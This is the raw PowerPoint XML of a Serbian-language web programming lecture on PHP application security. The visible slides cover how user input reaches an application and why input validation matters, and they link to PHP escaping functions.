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9" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId43"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId44"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="422" r:id="rId3"/>
    <p:sldId id="402" r:id="rId4"/>
    <p:sldId id="329" r:id="rId5"/>
    <p:sldId id="423" r:id="rId6"/>
    <p:sldId id="304" r:id="rId7"/>
    <p:sldId id="424" r:id="rId8"/>
    <p:sldId id="403" r:id="rId9"/>
    <p:sldId id="404" r:id="rId10"/>
    <p:sldId id="405" r:id="rId11"/>
    <p:sldId id="330" r:id="rId12"/>
    <p:sldId id="425" r:id="rId13"/>
    <p:sldId id="426" r:id="rId14"/>
    <p:sldId id="427" r:id="rId15"/>
    <p:sldId id="428" r:id="rId16"/>
    <p:sldId id="406" r:id="rId17"/>
    <p:sldId id="429" r:id="rId18"/>
    <p:sldId id="430" r:id="rId19"/>
    <p:sldId id="431" r:id="rId20"/>
    <p:sldId id="432" r:id="rId21"/>
    <p:sldId id="433" r:id="rId22"/>
    <p:sldId id="434" r:id="rId23"/>
    <p:sldId id="436" r:id="rId24"/>
    <p:sldId id="437" r:id="rId25"/>
    <p:sldId id="438" r:id="rId26"/>
    <p:sldId id="439" r:id="rId27"/>
    <p:sldId id="440" r:id="rId28"/>
    <p:sldId id="441" r:id="rId29"/>
    <p:sldId id="442" r:id="rId30"/>
    <p:sldId id="443" r:id="rId31"/>
    <p:sldId id="444" r:id="rId32"/>
    <p:sldId id="445" r:id="rId33"/>
    <p:sldId id="446" r:id="rId34"/>
    <p:sldId id="447" r:id="rId35"/>
    <p:sldId id="448" r:id="rId36"/>
    <p:sldId id="449" r:id="rId37"/>
    <p:sldId id="450" r:id="rId38"/>
    <p:sldId id="451" r:id="rId39"/>
    <p:sldId id="452" r:id="rId40"/>
    <p:sldId id="453" r:id="rId41"/>
    <p:sldId id="454" r:id="rId42"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId45"/>
      <p:bold r:id="rId46"/>
      <p:italic r:id="rId47"/>
      <p:bold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Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId53"/>
      <p:bold r:id="rId54"/>
      <p:italic r:id="rId55"/>
      <p:boldItalic r:id="rId56"/>
    </p:embeddedFont>
  </p:embeddedFont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 autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="67" d="100"/>
          <a:sy n="67" d="100"/>
        </p:scale>
        <p:origin x="1600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0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111DFAC3-C08A-4CE2-B7FB-26530B0ABFA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sr-Latn-RS"/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A303700F-029E-4A38-87F9-3943AB42FF9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sr-Latn-RS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57348" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B7097F5-087B-42C7-919E-E001B1956C3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sr-Latn-RS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57349" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C118137-F3CB-485D-A1ED-91F077CF25B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9FEA4B0-F5F2-462E-BAF9-AF4A2614C509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AA825095-1C16-40CB-B36D-98B471054DE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sr-Latn-RS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6E88EABA-9B93-4896-A946-1AD36FE575B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altLang="sr-Latn-RS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151E91C3-5F7A-4CD9-8602-72E1E7217D9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4581" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FE4305D-D5D6-427E-8968-0D0AB231852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/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS"/>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24582" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8567FEBE-79B3-473B-910B-59D6F284DF6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sr-Latn-RS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24583" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1613A9AB-5B1F-480B-A4FC-EB24562408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9EDD084-73DE-4042-9491-B3F89D8181E4}" type="slidenum">
              <a:rPr lang="en-GB" altLang="sr-Latn-RS"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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03909-3F90-4ABD-8643-13E5EE01AF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r-Latn-M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806292-C85B-4C3C-93D5-407BF25A1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554932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5287A-A062-4F53-871E-906AFC6B4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M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D377ED-D46C-4645-8706-E64E2A4AE0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078276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820F2-8156-4CAB-A665-01952253AC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91325" y="153988"/>
            <a:ext cx="2046288" cy="59880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r-Latn-M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846EAE-D733-4233-90BD-56F9E5D051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7700" y="153988"/>
            <a:ext cx="5991225" cy="59880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44255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0C51D-DBCA-4C39-BEFD-CE8E61BF9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M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3180B8-1932-4948-A941-BCBC2DE90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4053512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C3DC2-95EE-4029-8A55-1C59573A7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r-Latn-M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18269-3D41-420B-BC7D-918259150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9384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84CE5-7211-47D2-910F-BDC41D514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M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90407-099E-45B1-9AC3-851E25491E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0925" y="1854200"/>
            <a:ext cx="3521075" cy="4287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EB7DC0-4118-45A9-BDCB-41B1E49DE5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4400" y="1854200"/>
            <a:ext cx="3521075" cy="4287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822694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394D1-8B53-4E02-8450-102D615A4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M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7A11B6-480D-45EF-90FE-569D7861D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BFA76D-74AD-40FA-B01D-606BE691F0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EF7112-0E48-4C43-B6E9-A8D84A5790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591A5-E72D-412C-B6E8-EEEF97AEB9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037585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33A8D-6286-44E3-AA17-69112F5B4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1082293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61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FA5F-4957-4491-886A-638BEB0C1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r-Latn-M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42DA2-72D7-4124-BF74-08CA51BADD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95C352-5EEA-4725-BFEB-CAA1BCE40A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6370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A970D-8247-4C00-B6F2-F93FEBC0B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r-Latn-M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C97D64-FBD5-4BEE-BC08-B72157A7F4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M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6925F0-DE70-45BC-BCAC-8F494CC0E9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851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001382B-0FFC-4A36-8C1C-1E02FB5FF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8" y="1004888"/>
            <a:ext cx="7569200" cy="5229225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCFEB9"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="009094"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="919191"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="sr-Latn-ME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72FC997-500E-4A6F-84AB-F7C9C4ABD1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47700" y="153988"/>
            <a:ext cx="8189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/>
              <a:t>Slide Title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9F551FD1-A609-46AA-B11C-88B7FED6CA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50925" y="1854200"/>
            <a:ext cx="7194550" cy="428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/>
              <a:t>Body Text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-R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anose="05000000000000000000" pitchFamily="2" charset="2"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anose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:defRPr sz="30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anose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:defRPr sz="30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anose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:defRPr sz="30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anose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:defRPr sz="30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anose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:defRPr sz="30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anose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:defRPr sz="30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anose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:defRPr sz="30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buClr>
          <a:srgbClr val="DC0081"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:defRPr sz="30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279400" indent="-279400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="60000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="D60093"/>
        </a:buClr>
        <a:buSzPct val="70000"/>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="n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90563" indent="-296863" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="60000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="D60093"/>
        </a:buClr>
        <a:buSzPct val="65000"/>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="l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04863" algn="l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919163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php.net/manual/en/function.htmlspecialchars.php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php.net/manual/en/function.htmlentities.php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php.net/manual/en/function.strip-tags.php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5B36D1A-6482-4EE8-B494-7338AC7016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3588" y="1008063"/>
            <a:ext cx="7524750" cy="52197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algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="sr-Latn-ME" altLang="sr-Latn-RS" sz="5400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Predavanje 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="5400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="sr-Latn-ME" altLang="sr-Latn-RS" sz="5400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="sr-Latn-ME" altLang="sr-Latn-RS" sz="5400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Web Programiranje</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="sr-Latn-ME" altLang="sr-Latn-RS" sz="5400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="3200" dirty="0" err="1"/>
              <a:t>Sigurnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="3200" dirty="0"/>
              <a:t> PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="3200" dirty="0" err="1"/>
              <a:t>aplikacija</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-R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76CA7-E9FE-49D2-87C8-C6FB9FA8B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err="1"/>
              <a:t>Slanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-ME" sz="3200" dirty="0"/>
              <a:t> ulaznih podataka</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-ME" dirty="0">
              <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204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FE1AE-D125-48B2-BD56-558F06559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Svaka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>napisana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cilju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izvrši</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zahtjeve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisnika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Ti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zahtevi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mogu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: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>prikaži</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> mi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>stranicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>pošalji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>napisani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> mail” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>uloguj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> me”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odnosno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>komande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podaci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisnik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>šalje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikaciji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Interpretiranje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>komandi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 je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>osnovna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>delatnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>baš</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>toj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>interpretaciji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>leže</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>najveći</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sigurnosni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>rizici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Komande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podaci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>šaljemo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikaciji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nazivaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inputi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mogu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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>poslati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>putem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>adrese</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>formulara</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Kolačića</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> (cookie)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Parametara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>headeru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zahtjeva</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="sr-Latn-CS" altLang="sr-Latn-RS" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363586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7251-492A-4904-84CD-8E6D8AFEE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err="1"/>
              <a:t>Validacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1"/>
              <a:t>ulaza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33C4E-9296-4B1B-BC2B-416F895CF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5363"/>
            <a:ext cx="7407275" cy="5557837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Najveći</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sugurnosni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>propusti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>leže</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>interpretaciji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>inputa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, pa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>stoga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>validacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>komandi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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>predstavlja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>najveći</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sigurnosni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zadatak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kreiranju</a:t>
            </a:r>
            <a:r>
